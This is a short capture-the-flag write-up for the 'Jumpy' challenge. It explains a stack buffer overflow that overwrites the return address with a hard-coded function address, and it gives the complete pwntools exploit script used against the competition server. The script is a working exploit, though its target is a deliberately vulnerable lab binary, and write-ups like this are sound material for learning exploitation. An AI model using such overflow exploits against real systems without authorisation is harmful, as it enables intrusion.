200 WCSCCTF Jumpy



Description of Challenge

This challenge was two parts, the first part was overflowing the buffer of size, and the second part was overwriting the return address with the address of winrar. Since there was no alsr and we are given the binary, the address can be hard coded.

The size needed to prime fill the stack up to the return address was 24 , so we sent 24 A's and the return address

Exploit

from pwn import *  
import time  
context(arch='amd64', os='linux')  
context.log_level = True  
binary      = ELF('jumpy')  
competition = True

if competition:  
    conn = remote("wcscctf.org", 8484)
else:  
    conn = remote('localhost', 1234)

def getInput():  
    print conn.recvline()

def sendPayload():  
    #no aslr
    winAddress = p64(0x400636)
    filler   =   'a'*24
    payload  =   filler + winAddress
    #test the payload in gdb to see if it overwrote registers
    with open('payload', 'w') as f:
        f.write(payload)
    conn.sendline(payload)
    time.sleep(1)
    print conn.recvline() + conn.recvline()

if __name__ == "__main__":  
    getInput()
    sendPayload()
Press ` to check out my sick terminal!